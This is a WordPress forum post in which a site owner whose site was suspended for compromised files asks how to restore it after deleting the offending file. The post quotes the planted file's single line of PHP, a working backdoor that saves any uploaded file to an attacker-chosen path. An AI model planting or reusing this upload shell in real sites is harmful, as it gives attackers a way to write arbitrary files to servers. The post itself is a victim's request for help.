Site suspended and now doesn't work
-
A site I created four years ago was suspended by the ISP due to ‘A security audit has identified one or more compromised files within the webspace for edinburghinnwells.co.uk. The ISP failed to send the security_health_check.log which listed what was wrong, and finally I got this:
the offending file is in folder tinymce — wp-includes/tinymce/js/themes/index.php
There is only one line of code in the file
<?php if ($_FILES[‘F1l3’]) {move_uploaded_file($_FILES[‘F1l3’][‘tmp_name’], $_POST[‘Name’]); echo ‘OK’; } else { echo ‘You are forbidden!’; } ?>
I was told to delete this and I did and uploaded the file.
Since then although the site was reported to be unsuspended, I can’t access it or wp-admin/ and all there is is a blank page.
The ISP thinks it is Russian Trojan code. It moves one file from one place to another apparently – they don’t know why.
Anyone got any ideas how I can proceed? Are online backups not kept by ISPs in case of attacks damaging sites?
- The topic ‘Site suspended and now doesn't work’ is closed to new replies.